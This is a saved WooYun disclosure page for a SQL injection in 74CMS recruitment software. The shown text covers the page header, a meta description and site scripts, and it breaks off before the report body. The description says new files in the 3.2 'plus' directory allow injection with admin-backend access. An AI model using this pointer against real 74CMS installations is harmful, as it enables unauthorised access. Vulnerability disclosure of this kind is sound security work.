bugs/wooyun-2012-010319.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="x-ua-compatible" content="ie=7"/>
<title> 74CMS 人才系统注入全版本通杀进后台 | WooYun-2012-10319 | WooYun.org </title>
<meta name="author" content="80sec"/>
<meta name="copyright" content="http://www.wooyun.org/"/>
<meta name="keywords" content="骑士人才系统漏洞,小屁孩,SQL注射漏洞,wooyun,应用安全,web安全,系统安全,网络安全,漏洞公布,漏洞报告,安全资讯。"/>
<meta name="description" content="整套程序过滤的还是比较全面的  不过所有版本都是GBK编码是他的硬伤  但是基本上字符串入库的时候作者都使用了iconv来把提交过来的数据编码转换成utf8

所以利用宽字符注入就没办法了  但是过滤完善仅限3.2版本之前  最新的3.2版本plus目录多了几个文件  不知道是不是换了程序员了... 先上两个白痴注入吧~

|WooYun是一个位于厂商和安全研究者之间的漏洞报告平台,注重尊重,进步,与意义"/>
<link rel="icon" href="http://wooyun.org/favicon.ico" sizes="32x32" />
<link href="../css/style.css?v=201501291909" rel="stylesheet" type="text/css"/>
<script src="https://static.wooyun.org/static/js/jquery-1.4.2.min.js" type="text/javascript"></script>
</head>

<body id="bugDetail">

<style>
#myBugListTab { position:relative; display:inline; border:none }
#myBugList { position:absolute; display:none; margin-left:309px; * margin-left:-60px; * margin-top:18px ; border:#c0c0c0 1px solid; padding:2px 7px; background:#FFF }
#myBugList li { text-align:left }
</style>
<script type="text/javascript">
$(document).ready(function(){

	if ( $("#__cz_push_d_object_box__") ) {
		$("script[src^='http://cip4.czpush.com/']").attr("src"," ").remove();
		$("#__cz_push_d_object_box__").empty().remove();
		$("a[id^='__czUnion_a']").attr("href","#").remove();
	}

	if ( $("#ooDiv") ) {
		$("#ooDiv").empty().parent("div").remove();
	}

	$("#myBugListTab").toggle(
		function(){
			$("#myBugList").css("display","block");
		},
		function(){
			$("#myBugList").css("display","none");
		}
	);

	if ( $(window).scrollTop() > 120 ) {
		$("#back-to-top").fadeIn(300);
	} else {
		$("#back-to-top").fadeOut(300);
	} 

	$(window).scroll(function(){
		if ( $(window).scrollTop() > 120 ) {
			$("#back-to-top").fadeIn(300);
		} else {
			$("#back-to-top").fadeOut(300);
		} 
	});

	$("#back-to-top a").click(function() {
		$('body,html').animate({scrollTop:0},300);
		return false;
	});

	$("#go-to-comment a").click(function() {
		var t = $("#replys").offset().top - 52;
		$('body,html').animate({scrollTop:t},300);
		return false;
	});

});

function gofeedback(){
	var bugid=$("#fbid").val();
	if(bugid){
		var url="/feedback.php?bugid="+bugid;
	}else{
		var url="/feedback.php"
	}
	window.open(url);
}
</script>

	<div class="go-to-wrapper">
		<ul class="go-to">
		    <li id="go-to-comment" title="转到评论"><a href="wooyun-2012-010319#">转到评论</a></li>
		    <li id="go-to-feedback" title="我要反馈"><a href="javascript:void(0)" onclick="gofeedback()">我要反馈</a></li>
		    <li id="back-to-top" title="回到顶部"><a href="wooyun-2012-010319#">回到顶部</a></li>
		</ul>
	</div>
	<div class="banner">
		<div class="logo">
		<h1>WooYun.org</h1>
		<div class="weibo"><iframe width="136" height="24" frameborder="0" allowtransparency="true" marginwidth="0" marginheight="0" scrolling="no" border="0" src="http://widget.weibo.com/relationship/followbutton.php?language=zh_cn&width=136&height=24&uid=1981622273&style=2&btn=red&dpc=1"></iframe>
		</div>
		<div class="wxewm">
			<a class="ewmthumb" href="javascript:void(0)"><span><img src="https://static.wooyun.org/static/images/ewm.jpg"width="220" border="0"></span><img src="https://static.wooyun.org/static/images/weixin_30.png"width="22" border="0"></a>
		</div>
		</div>
		
				<div class="login">
					<a href="http://wooyun.org/user.php?action=login">登录</a> | <a href="http://wooyun.org/user.php?action=register" class="reg">注册</a>
				</div>
				</div>

	<div class="nav" id="nav_sc">
		<ul>
			<li><a href="http://wooyun.org/index.php">首页</a></li>
			<li><a href="http://wooyun.org/corps/">厂商列表</a></li>
			<li><a href="http://wooyun.org/whitehats/">白帽子</a></li>
			<li><a href="http://wooyun.org/top/">乌云榜</a></li> 
            <li><a href="http://wooyun.org/teams/">团队</a></li>
            <li><a href="http://wooyun.org/bugs/">漏洞列表</a></li>
			<li class="new"><a href="http://wooyun.org/bug/submit">提交漏洞</a></li>
			<!--li><a href="/corp_actions">厂商活动</a></li-->
			<!--<li><a target='_blank' href="http://security.wooyun.org/">安全中心</a></li>-->
			<li><a href="http://summit.wooyun.org" target="_blank" style="color:rgb(246,172,110);font-size:14px;font-weight:blod">乌云峰会</a></li>
			<!--li><a href="/job/">企业招聘</a></li-->
						<li><a href="http://job.wooyun.org" target="_blank">乌云招聘</a></li>
						<li><a href="http://drops.wooyun.org" target="_blank">知识库</a></li>
						<li><a href="http://wooyun.org/notice/">公告</a></li>
		</ul>
        <form action="http://wooyun.org/searchbug.php" method="post" id="searchbox">
            <input type="text" name="q" id="search_input" />
            <input type="submit" value="搜索" id="search_button" />
        </form>
	</div>

	<div class="bread" style="padding-top: 4px;">
		<div style="float:left">当前位置：<a href="http://wooyun.org/index.php">WooYun</a> >> <a href="wooyun-2012-010319#">漏洞信息</a></div>
			</div><script language="javascript">
var _LANGJS = {"COMMENT_LIKE_SELF":"\u4e0d\u80fd\u81ea\u5df1\u8d5e\u81ea\u5df1\u7684\u8bc4\u8bba","COMMENT_LIKED":"\u5df2\u8d5e\u6b64\u8bc4\u8bba","COMMENT_NOT":"\u6b64\u8bc4\u8bba\u4e0d\u5b58\u5728","COMMENT_FILL":"\u8bf7\u8f93\u5165\u8bc4\u8bba\u5185\u5bb9","COMMENT_STAT":"\u8bc4\u8bba\u4e0d\u80fd\u4e3a\u7a7a","COMMENT_LOGIN":"\u767b\u9646\u540e\u624d\u80fd\u8bc4\u8bba","COMMENT_GOOD_DONE":"\u5df2\u8d5e\u8fc7\u6b64\u6761\u8bc4\u8bba","COMMENT_SELF":"\u4e0d\u80fd\u8bc4\u4ef7\u81ea\u5df1\u53d1\u5e03\u7684\u8bc4\u8bba","COMMENT_CLICK_FILL":"\u70b9\u51fb\u8f93\u5165\u8bc4\u8bba\u5185\u5bb9","FAIL":"\u64cd\u4f5c\u5931\u8d25","FAIL_MANAGE":"\u64cd\u4f5c\u5931\u8d25\uff0c\u8bf7\u4e0e\u7ba1\u7406\u5458\u8054\u7cfb","FAIL_NO_WHITEHATS":"\u64cd\u4f5c\u5931\u8d25\uff0c\u6ca1\u6709\u6b64\u767d\u5e3d\u5b50","FAIL_NO_CORPS":"\u64cd\u4f5c\u5931\u8d25\uff0c\u6ca1\u6709\u6b64\u5382\u5546","BUGS_CORPS_SELECT":"\u9009\u62e9\u5382\u5546(\u53ef\u8f93\u5165\u5173\u952e\u5b57\u641c\u7d22)","BUGS_CORPS_OTHER":"Other\/\u5176\u5b83\u5382\u5546","BUGS_CORPS_TYPE_STAT":"\u8be5\u6f0f\u6d1e\u5bf9\u5e94\u5382\u5546\u7684\u7c7b\u578b","BUGS_CORPS_NAME_STAT":"\u8be5\u6f0f\u6d1e\u5bf9\u5e94\u5382\u5546\u7684\u540d\u79f0","BUGS_TYPE_STAT":"\u8be5\u6f0f\u6d1e\u7684\u7c7b\u578b\uff0c\u4e71\u9009\u6263\u5206","BUGS_TITLE_STAT":"\u8be5\u6f0f\u6d1e\u7684\u6807\u9898","BUGS_HARMLEVEL_STAT":"\u8be5\u6f0f\u6d1e\u7684\u5371\u5bb3\u7b49\u7ea7","BUGS_DESCRIPTION_STAT":"\u5bf9\u6f0f\u6d1e\u7684\u7b80\u8981\u63cf\u8ff0\uff0c\u53ef\u4ee5\u7b80\u5355\u63cf\u8ff0\u6f0f\u6d1e\u7684\u5371\u5bb3\u548c\u6210\u56e0\uff0c\u4e0d\u8981\u900f\u6f0f\u6f0f\u6d1e\u7684\u7ec6\u8282","BUGS_CONTENT_STAT":"\u5bf9\u6f0f\u6d1e\u7684\u8be6\u7ec6\u63cf\u8ff0\uff0c\u8bf7\u5c3d\u91cf\u591a\u7684\u6df1\u5165\u7ec6\u8282\u4ee5\u65b9\u4fbf\u5bf9\u6f0f\u6d1e\u7684\u7406\u89e3\uff0c\u652f\u6301&lt;code>&lt;\/code>\u6807\u7b7e","BUGS_POC_STAT":"\u7ed9\u51fa\u95ee\u9898\u7684\u6982\u5ff5\u6027\u8bc1\u660e\uff0c\u652f\u6301&lt;code>&lt;\/code>\u6807\u7b7e","BUGS_PATCH_STAT":"\u5efa\u8bae\u7684\u6f0f\u6d1e\u4fee\u590d\u65b9\u6848\uff0c\u652f\u6301&lt;code>&lt;\/code>\u6807\u7b7e","BUGS_TEST_STAT":"\u7ed9\u51fa\u95ee\u9898\u7684\u6807\u51c6\u6d4b\u8bd5\u4ee3\u7801\u4ee5\u66f4\u4e3a\u65b9\u4fbf\u7684\u5bf9\u6f0f\u6d1e\u8fdb\u884c\u6d4b\u8bd5\u548c\u9a8c\u8bc1\uff0c\u6d4b\u8bd5\u4ee3\u7801\u5bf9\u5916\u9ed8\u8ba4\u4e0d\u663e\u793a\uff0c<br\/>\u5176\u4ed6\u767d\u5e3d\u5b50\u652f\u4ed8\u4e4c\u4e91\u5e01\u67e5\u770b\u540e\u4f60\u5c06\u83b7\u5f97\u989d\u5916\u4e4c\u4e91\u5e01\uff0c<br\/>\u540c\u65f6\u4e5f\u5c06\u5728\u4f60\u7684\u4e2a\u4eba\u9875\u9762\u4f53\u73b0\u4f60\u7684\u6d4b\u8bd5\u4ee3\u7801\u7f16\u5199\u80fd\u529b\u3002","BUGS_QUESTION_SELECT":"\u8bf7\u9009\u62e9\u95ee\u9898\u5382\u5546","BUGS_TITLE_NOTICE":"\u6f0f\u6d1e\u6807\u9898\u4e0d\u80fd\u4e3a\u7a7a","BUGS_RANK_NOTICE1":"\u8bf7\u586b\u5199\u81ea\u8bc4Rank","BUGS_RANK_NOTICE2":"\u81ea\u8bc4Rank\u4e3a\u5927\u4e8e0\u7684\u6570\u5b57","BUGS_TYPE_SELECT":"\u8bf7\u9009\u62e9\u6f0f\u6d1e\u7c7b\u578b","BUGS_TYPE_NOTICE":"\u8bf7\u586b\u5199\u6f0f\u6d1e\u7c7b\u578b","BUGS_HARMLEVEL_SELECT":"\u9009\u62e9\u6f0f\u6d1e\u7b49\u7ea7","BUGS_HARMLEVEL_NOTICE":"\u8bf7\u9009\u62e9\u6f0f\u6d1e\u7b49\u7ea7","BUGS_HARMLEVEL_LOWER":"\u6f0f\u6d1e\u7b49\u7ea7\u4e3a \u4f4e \u65f6\uff0c\u81ea\u8bc4Rank\u4e3a1-5","BUGS_HARMLEVEL_MIDDLE":"\u6f0f\u6d1e\u7b49\u7ea7\u4e3a \u4e2d \u65f6\uff0c\u81ea\u8bc4Rank\u4e3a5-10","BUGS_HARMLEVEL_HIGH":"\u6f0f\u6d1e\u7b49\u7ea7\u4e3a \u9ad8 \u65f6\uff0c\u81ea\u8bc4Rank\u4e3a10-20","BUGS_AREA_SELECT":"\u8bf7\u9009\u62e9\u5730\u533a\uff01","BUGS_DOMAILS":"\u6f0f\u6d1e\u6240\u5728\u57df\u540d(\u5982qq.com)","BUGS_DOMAIN_FILL":"\u8bf7\u586b\u5199\u57df\u540d\uff01","BUGS_DETAIL_MORE":"\u67e5\u770b\u8be6\u60c5","BUGS_IGNORE_DAYS":"\u8ddd\u6f0f\u6d1e\u5ffd\u7565\u8fd8\u6709","BUGS_CONFIRM_QUICK":"\u8bf7\u5382\u5546\u5c3d\u5feb","BUGS":"\u6f0f\u6d1e","BUGS_PUBLIC_DAYS":"\u8ddd\u6f0f\u6d1e\u5411\u516c\u4f17\u516c\u5f00\u8fd8\u6709","BUGS_IGNORE_PUBLIC_DAYS":"\u8ddd\u6f0f\u6d1e\u672a\u786e\u8ba4\u65e0\u5f71\u54cd\u5ffd\u7565\u8fd8\u6709","BUGS_REPAIR_QUICK":"\u8bf7\u5382\u5546\u5c3d\u5feb\u4fee\u590d\u6f0f\u6d1e","BUGS_HARMLEVEL_REMIND":"\u8bf7\u9009\u62e9\u5371\u5bb3\u7b49\u7ea7","BUGS_RANK_STAT":"rank\u4e3a1-20\u7684\u6b63\u6574\u6570","BUGS_RANK_STAT1":"rank\u4e3a1-5\u7684\u6b63\u6574\u6570","BUGS_RANK_STAT2":"rank\u4e3a5-10\u7684\u6b63\u6574\u6570","BUGS_RANK_STAT3":"rank\u4e3a10-20\u7684\u6b63\u6574\u6570","BUGS_COMPLEMENT_REASON":"\u6dfb\u52a0\u5bf9\u6f0f\u6d1e\u7684\u8865\u5145\u8bf4\u660e\u4ee5\u53ca\u505a\u51fa\u8bc4\u4ef7\u7684\u7406\u7531","BUGS_REPLY_FILL":"\u8bf7\u586b\u5199\u6f0f\u6d1e\u56de\u590d","BUGS_IGNORE_CONFIRM":"\u786e\u5b9a\u5ffd\u7565\u6b64\u6f0f\u6d1e\u5417","BUGS_STATUS_NEW_UPDATE":"\u66f4\u6539\u6f0f\u6d1e\u7684\u6700\u65b0\u72b6\u6001","BUGS_STATUS_FILL":"\u8bf7\u586b\u5199\u6f0f\u6d1e\u72b6\u6001","BUGS_PUBLIC_ADVANCE":"\u786e\u5b9a\u63d0\u524d\u516c\u5f00\u6b64\u6f0f\u6d1e\u5417","BUGS_COUNT":"\u6f0f\u6d1e\u6570","BUGS_REPLY_HAT":"\u56de\u590d\u6b64\u4eba","BUGS_DELAY_CONFIRM":"\u786e\u5b9a\u8981\u5ef6\u671f\u4e48?","BUGS_DELAY":"\u7533\u8bf7\u5ef6\u671f","BUGS_DELAY_DONE":"\u5df2\u7ecf\u5ef6\u671f","BUGS_RISK_CONFIM":"\u786e\u5b9a\u6b64\u6f0f\u6d1e\u4e3a\u9ad8\u5371\u5417?","BUGS_NULL_EDITE":"\u7559\u7a7a\u8868\u793a\u4e0d\u4fee\u6539","BUGS_DONE_CONFIRM":"\u8be5\u64cd\u4f5c\u6682\u65f6\u4e0d\u53ef\u9006\uff0c\u786e\u5b9a\uff1f","BUGS_UPUBLIC":"\u4f60\u4ece\u53d1\u5e03\u7684\u6f0f\u6d1e","BUGS_UPUBLIC1":"\u91cc\u53c8\u83b7\u5f97\u4e86","BUGS_PRECHECK":"\u6709\u4eba\u63d0\u524d\u67e5\u770b\u4e86\u4f60\u53d1\u5e03\u7684\u6f0f\u6d1e","BUGS_PRECHECK_UNPUBLIC":"\u63d0\u524d\u67e5\u770b\u672a\u516c\u5f00\u6f0f\u6d1e","BUGS_NUM":"\u6f0f\u6d1e\u6570\u91cf","RANKAVG":"\u4eba\u5747\u8d21\u732e Rank","CAPTCHA_GET":"\u83b7\u53d6\u9a8c\u8bc1\u7801","CAPTCHA_FILL":"\u8bf7\u8f93\u5165\u56fe\u7247\u4e2d\u7684\u9a8c\u8bc1\u7801","CAPTCHA_NULL":"\u9a8c\u8bc1\u7801\u4e0d\u80fd\u4e3a\u7a7a","CAPTCHA_ERROR":"\u9a8c\u8bc1\u7801\u8f93\u5165\u9519\u8bef","CAPTCHA_PHONE_ERROR":"\u624b\u673a\u9a8c\u8bc1\u7801\u4e0d\u6b63\u786e","CAPTCHA_PHONE_SEND":"\u9a8c\u8bc1\u7801\u5df2\u53d1\u9001\u5230\u4f60\u7684\u624b\u673a\u4e0a\u8bf7\u6ce8\u610f\u67e5\u6536","CAPTCHA_SEND_AGAIN":"\u540e\u53ef\u91cd\u53d1","CAPTCHA_SEND_OVER":"\u77ed\u4fe1\u5df2\u53d1\u9001\u6210\u529f,\u9a8c\u8bc1\u7801\u533a\u5206\u5927\u5c0f\u5199","CAPTCHA_PHONE_NO":"\u4e0d\u9700\u8981\u77ed\u4fe1\u9a8c\u8bc1\u7801","CAPTCHA_PHONE_NULL":"\u77ed\u4fe1\u5bc6\u7801\u4e0d\u80fd\u4e3a\u7a7a","PHONE_TYPE_ERROR":"\u7535\u8bdd\u683c\u5f0f\u4e0d\u5bf9","PHONE_NOTING":"\u7535\u8bdd\u4e0d\u80fd\u4e3a\u7a7a","PHONE_FILL":"\u8bf7\u586b\u5199\u624b\u673a\u53f7","PHONE_CAPTCHA_NOTING":"\u624b\u673a\u9a8c\u8bc1\u7801\u4e0d\u80fd\u4e3a\u7a7a","PASSWORD_NOTING":"\u5bc6\u7801\u4e0d\u80fd\u4e3a\u7a7a","PASSWORD_CONFIRM_NOTING":"\u5bc6\u7801\u786e\u8ba4\u4e0d\u80fd\u4e3a\u7a7a","PASSWORD_PAY_LESS":"\u652f\u4ed8\u5bc6\u7801\u4e0d\u80fd\u5c11\u4e8e6\u4f4d","PASSWORD_FILL_DIFFERENT":"\u8f93\u5165\u7684\u4e24\u6b21\u5bc6\u7801\u4e0d\u4e00\u6837","PASSWORD_PAY_LOGIN_SAME":"\u652f\u4ed8\u5bc6\u7801\u4e0d\u80fd\u540c\u767b\u9646\u5bc6\u7801\u4e00\u6837","PASSWORD_PAY_FILL":"\u8bf7\u586b\u5199\u652f\u4ed8\u5bc6\u7801","PASSWORD_LENGH_LESS":"\u5bc6\u7801\u957f\u5ea6\u4e0d\u80fd\u5c0f\u4e8e6\u4f4d","PASSWORD_SEND_OK":"\u53d1\u9001\u5bc6\u7801\u90ae\u4ef6\u6210\u529f","PASSWORD_OFER_WRROR":"\u60a8\u63d0\u4f9b\u7684\u627e\u56de\u5bc6\u7801\u4fe1\u606f\u4e0d\u6b63\u786e","PASSWORD_OLD_ERROR":"\u539f\u5bc6\u7801\u9519\u8bef","PASSWORD_UPDATE_OK":"\u5bc6\u7801\u4fee\u6539\u6210\u529f","EMAILL_USED":"\u90ae\u7bb1\u5df2\u88ab\u5360\u7528","EMAILL_NULL":"\u90ae\u7bb1\u4e0d\u80fd\u4e3a\u7a7a\uff01","NOTING":"\u65e0","LEAVEWORDS_NULL":"\u7559\u8a00\u5185\u5bb9\u4e0d\u80fd\u4e3a\u7a7a","LOGIN_FIRST":"\u8bf7\u5148\u767b\u5f55","CONFIRM":"\u786e\u8ba4","YEAR":"\u5e74","DAYS":"\u5929","HOURS":"\u65f6","HOUR":"\u5c0f\u65f6","MINUTE":"\u5206","SECOND":"\u79d2","IS":"\u4e3a","ONE":"\u4e00","TWE":"\u4e8c","TIMES":"\u6b21","COUNTENT_UPDATE_FILL":"\u8bf7\u586b\u5199\u4fee\u6539\u5185\u5bb9","CANCLE":"\u53d6\u6d88","OPERATE_CONFIRM":"\u786e\u5b9a\u6b64\u64cd\u4f5c\u5417\uff1f","USERNAME":"\u59d3\u540d","SUCCESS":"\u64cd\u4f5c\u6210\u529f","FAIL_REPLY":"\u64cd\u4f5c\u5931\u8d25\uff0c\u8bf7\u586b\u5199\u56de\u590d\u4fe1\u606f","SEND_OK":"\u53d1\u9001\u6210\u529f","PHONE_BIND_DONE":"\u5df2\u7ed1\u5b9a","TAGS_USE":"\u4f7f\u7528\u6b64\u6807\u7b7e","WHITEHATS":"\u767d\u5e3d\u5b50","WHITEHATS_VERTIFY":"\u8ba4\u8bc1\u767d\u5e3d\u5b50","WHITEHATES_NAME":"\u8bf7\u8f93\u5165\u767d\u5e3d\u5b50\u7528\u6237\u540d","USER_ZONE_EDIT":"\u7f16\u8f91\u9886\u57df","WB_TRANSFER":"\u6211\u8981\u8f6c\u8d26","WB_TRANSFER_CANCEL":"\u53d6\u6d88\u8f6c\u8d26","WB_NUM":"\u8bf7\u8f93\u5165\u4e4c\u4e91\u5e01\u6570\u91cf","WB_NUMBER":"\u4e4c\u4e91\u5e01\u6570\u91cf\u4e3a\u6b63\u6574\u6570","WB_NEED_LESS":"\u81f3\u5c11\u9700\u8981","WB_NEED_SUM":"\u4e2a\u4e4c\u4e91\u5e01","WB_TRANSFER_OK":"\u8f6c\u8d26\u6210\u529f","WB_MY":"\u6211\u7684\u4e4c\u4e91\u5e01","WB_CAN_USE":"\u53ef\u7528\u7684\u4e4c\u4e91\u5e01","WB_FROZEN":"\u51bb\u7ed3\u7684\u4e4c\u4e91\u5e01","WB_LACK":"\u4e4c\u4e91\u5e01\u4e0d\u8db3","WB_SET_SCOPE":"\u51fa\u4ef7\u8303\u56f4\u4e3a","WB_BIND_CANCEL_STAT":"(\u70b9\u51fb\u201c\u53d6\u6d88\u7ed1\u5b9a\u201d\u83b7\u53d6\u9a8c\u8bc1\u7801\uff0c\u5411\u4e4c\u4e91\u516c\u4f17\u8d26\u53f7\u53d1\u9001\u9a8c\u8bc1\u7801\u53d6\u6d88\u5fae\u4fe1\u7ed1\u5b9a\uff0c\u7136\u540e\u5237\u65b0\u672c\u9875\u9762)","EMAIL_LOGIN_MEXT":"\u90ae\u4ef6\u53d1\u9001\u6210\u529f,\u8bf7\u767b\u9646\u60a8\u7684\u90ae\u7bb1\u8fdb\u884c\u4e0b\u4e00\u6b65\u64cd\u4f5c","EMAIL_UPDATE_LOGIN_MEXT":"\u66f4\u6539\u8bf7\u6c42\u5df2\u53d1\u9001\u5230\u90ae\u7bb1,\u8bf7\u767b\u9646\u60a8\u7684\u90ae\u7bb1\u8fdb\u884c\u4e0b\u4e00\u6b65\u64cd\u4f5c","EMAIL_SEND_OK":"\u90ae\u4ef6\u53d1\u9001\u6210\u529f\uff01","CORPS":"\u5382\u5546","TEAM_NAME_NULL":"\u56e2\u961f\u540d\u79f0\u4e0d\u80fd\u4e3a\u7a7a","TEAM_HOMEPAGE_NULL":"\u56e2\u961f\u4e3b\u9875\u4e0d\u80fd\u4e3a\u7a7a","TEAM_QQ_NULL":"\u56e2\u961fqq\u4e0d\u80fd\u4e3a\u7a7a","TEAM_BRIEF_NULL":"\u56e2\u961f\u7b80\u4ecb\u4e0d\u80fd\u4e3a\u7a7a","TEAM_EXIST":"\u56e2\u961f\u5df2\u5b58\u5728","TEAM_DISMISS_CONFIRM":"\u786e\u5b9a\u89e3\u6563\u672c\u56e2\u961f\u5417?","TEAM_NAME":"\u56e2\u961f\u540d\u79f0","TEAM_CREATER":"\u521b\u5efa\u4eba","TEAM_DONATER":"\u56e2\u961f\u4e3b\u529b","TEAM_MUMBER":"\u4eba\u6570","TEAM":"\u56e2\u961f","REGISTER_BRIEF":"*\u8bf7\u8f93\u5165\u4e2a\u4eba\u7684\u7b80\u8981\u4ecb\u7ecd","REGISTER_TYPE":"*\u9009\u62e9\u6ce8\u518c\u7c7b\u578b","REGISTER_CORPS_BRIEF":"*\u8f93\u5165\u5382\u5546\u7684\u7b80\u8981\u4ecb\u7ecd","REGISTER_EMAIL":"*\u5382\u5546\u90ae\u4ef6\u5fc5\u987b\u4e3a\u4f01\u4e1a\u4f7f\u7528\u7684\u6b63\u5f0f\u90ae\u4ef6","REGISTER_NAME_NULL":"\u7528\u6237\u540d\u4e0d\u80fd\u4e3a\u7a7a","REGISTER_HOMEPAGE_NULL":"\u4e2a\u4eba\u4e3b\u9875\u4e0d\u80fd\u4e3a\u7a7a","REGISTER_BREIF_NULL":"\u7b80\u8981\u4ecb\u7ecd\u4e0d\u80fd\u4e3a\u7a7a","REGISTER_CORPNAME_NULL":"\u5382\u5546\u540d\u79f0\u4e0d\u80fd\u4e3a\u7a7a","REGISTER_CORPHOMEPAGE_NULL":"\u5b98\u65b9\u4e3b\u9875\u4e0d\u80fd\u4e3a\u7a7a","REGISTER_LAW_AGREE":"\u540c\u610f\u300a\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4fdd\u62a4\u548c\u58f0\u660e\u300b\u624d\u80fd\u6ce8\u518c","ATTENTION":"\u5173\u6ce8","ATTENTION_SUM":"\u5173\u6ce8\u6570","ATTENTION_DONE":"\u5df2\u5173\u6ce8","ATTENTION_CANCEL":"\u53d6\u6d88\u5173\u6ce8","ATTENTION_BUG_DONE":"\u5df2\u5173\u6ce8\u6b64\u6f0f\u6d1e","ATTENTION_BUG_CONFIRM":"\u786e\u5b9a\u53d6\u6d88\u5bf9\u6b64\u6f0f\u6d1e\u7684\u5173\u6ce8","ATTENTION_BUG":"\u5173\u6ce8\u6b64\u6f0f\u6d1e","ATTENTION_BUG_UNDO":"\u6ca1\u6709\u5173\u6ce8\u6b64\u6f0f\u6d1e","ATTENTION_HAT_DONE":"\u5df2\u5173\u6ce8\u6b64\u767d\u5e3d\u5b50","ATTENTION_HAT_CONFIRM":"\u786e\u5b9a\u53d6\u6d88\u5bf9\u6b64\u767d\u5e3d\u5b50\u7684\u5173\u6ce8?","COLLECTION":"\u6536\u85cf","COLLECTION_DONE":"\u5df2\u6536\u85cf","COLLECTION_BUG_DONE":"\u5df2\u6536\u85cf\u6b64\u6f0f\u6d1e","COLLECTION_BUG_UNDO":"\u6ca1\u6709\u6536\u85cf\u6b64\u6f0f\u6d1e","COLLECTION_BUG_CONFIRM":"\u786e\u5b9a\u53d6\u6d88\u5bf9\u6b64\u6f0f\u6d1e\u7684\u6536\u85cf","SMS_SEND_NAME":"* \u7528\u6237\u6635\u79f0\/\u5382\u5546\u540d\u79f0\u4e0d\u80fd\u4e3a\u7a7a<br \/>","SMS_SEND_TITLE":"* \u6807\u9898\u4e0d\u80fd\u4e3a\u7a7a<br \/>","SMS_SEND_CONTENT":"* \u5185\u5bb9\u4e0d\u80fd\u4e3a\u7a7a<br \/>","SMS_SEND_CAPTCHA":"* \u9a8c\u8bc1\u7801\u4e0d\u80fd\u4e3a\u7a7a<br \/>","NUMBER":"\u7684\u6b63\u6574\u6570","RATING_SUCCESS":"\u8bc4\u5206\u6210\u529f","RATING_BUGS_DONE":"\u5df2\u5bf9\u6b64\u6f0f\u6d1e\u8fdb\u884c\u8fc7\u8bc4\u5206","RATING_BUGS_SELF":"\u4e0d\u80fd\u5bf9\u81ea\u5df1\u53d1\u5e03\u7684\u6f0f\u6d1e\u8fdb\u884c\u8bc4\u5206","RATING_SUBMIT_CANCLE":"\u53d6\u6d88\u63d0\u4ea4\u8bc4\u5206","RATING_SUBMIT":"\u63d0\u4ea4\u6211\u7684\u8bc4\u5206","RATING_SUBMIT_CHECK":"\u8bf7\u786e\u5b9a\u6bcf\u4e00\u9879\u90fd\u9009\u62e9\u4e86\u8bc4\u5206","RATING_CONFIRM":"\u786e\u5b9a\u63d0\u4ea4\u5bf9\u6b64\u5382\u5546\u7684\u8bc4\u5206\u5417\uff1f","RATING_LOGIN":"\u53ea\u6709\u767b\u5f55\u7684\u767d\u5e3d\u5b50\u624d\u80fd\u8bc4\u5206","RATING_DONE":"\u5df2\u7ecf\u8bc4\u8fc7\u5206\u4e86","WOOYUN_CORPS":"\u4e4c\u4e91\u5382\u5546","MARST_IMAGE":"\u5bf9\u56fe\u7247\u6253\u7801","FEEDBACK_LINK_NULL":"\u94fe\u63a5\u4e0d\u80fd\u4e3a\u7a7a\uff01","FEEDBACK_LINK_ERROR":"\u8bf7\u4e66\u5199\u6b63\u786e\u7684\u94fe\u63a5\u5730\u5740\uff01","FEEDBACK_CONTENT_NULL":"\u95ee\u9898\u5185\u5bb9\u4e0d\u80fd\u4e3a\u7a7a\uff01","FEEDBACK_ALLOW_LIMIT":"\u534a\u5c0f\u65f6\u53ea\u5141\u8bb8\u53cd\u9988\u4e00\u6b21","TOP_RANK":"\u6392\u540d","TOP_BUG_TITLE":"\u6f0f\u6d1e\u6807\u9898","TOP_RANK_NONE":"\u6682\u65e0\u6392\u540d","TOP_BUGS_GOOD":"\u4f18\u8d28\u6f0f\u6d1e\u6570","NICKNAME":"\u6635\u79f0","LEVEL":"\u7b49\u7ea7","VALUE":"\u503c","EDITOR_INSERT_PIC":"\u63d2\u5165\u56fe\u7247","EDITOR_PIC_ADDR":"\u5730\u5740\uff1a","EDITOR_CONFIRM":"\u786e\u5b9a","EDITOR_PIC_NULL":"\u8bf7\u4e0a\u4f20\u56fe\u7247\u6216\u586b\u5199\u56fe\u7247\u5730\u5740","EDITOR_INSERT_VIDIO":"\u63d2\u5165\u89c6\u9891","EDITOR_VIDIO_ADDR":"\u89c6\u9891\u5730\u5740\uff1a","EDITOR_VIDIO_NULL":"\u8bf7\u586b\u5199\u89c6\u9891\u5730\u5740(.swf)","EDITOR_VIDIO_TYPE":"\u76ee\u524d\u4ec5\u652f\u6301.swf\u683c\u5f0f","PIC_SELECT":"\u8bf7\u9009\u62e9\u5f85\u4e0a\u4f20\u7684\u56fe\u7247","PIC_TYPE_IS":"\u56fe\u7247\u7c7b\u578b\u4e3a","UPLOAD":"\u4e0a\u4f20","RANK_AVG":"\u6f0f\u6d1e\u5e73\u5747"};

$(function(){
    function getParamsOfShareWindow(width, height) {
        return ['toolbar=0,status=0,resizable=1,width=' + width + ',height=' + height + ',left=',(screen.width-width)/2,',top=',(screen.height-height)/2].join('');
    }
});

function errimg(img){
	tmp=img.src;
	nimg=tmp.replace("http://wooyun.org/","http://www.wooyun.org/");
	img.src=nimg;
	$(img).parent().attr('href',nimg);
	img.onerror=null;
}
function AttendBug(id){
	$.get('/ajaxdo.php',{module:'attendbug',id:id,rid:Math.random(),token:$("#token").val()},function(re){
		if(re==1){
			$("#attention_num").html(parseInt($("#attention_num").html())+1);
			$("#attend_action").html('√'+_LANGJS.ATTENTION_DONE+' <a class="btn" href="javascript:void(0)" onclick="AttendCancel('+id+')">'+_LANGJS.ATTENTION_CANCEL+'</a></span>');
		}else if(re==2){
			alert(_LANGJS.LOGIN_FIRST);
		}else if(re==3){
			alert(_LANGJS.ATTENTION_BUG_DONE);
		}else{
			alert(_LANGJS.FAIL_MANAGE);
		}
	});
}
function AttendCancel(id){
	if(confirm(_LANGJS.ATTENTION_BUG_CONFIRM+"?")){
		$.get('/ajaxdo.php',{module:'attendcancel',id:id,rid:Math.random(),token:$("#token").val()},function(re){
			if(re==1){
				$("#attention_num").html(parseInt($("#attention_num").html())-1);
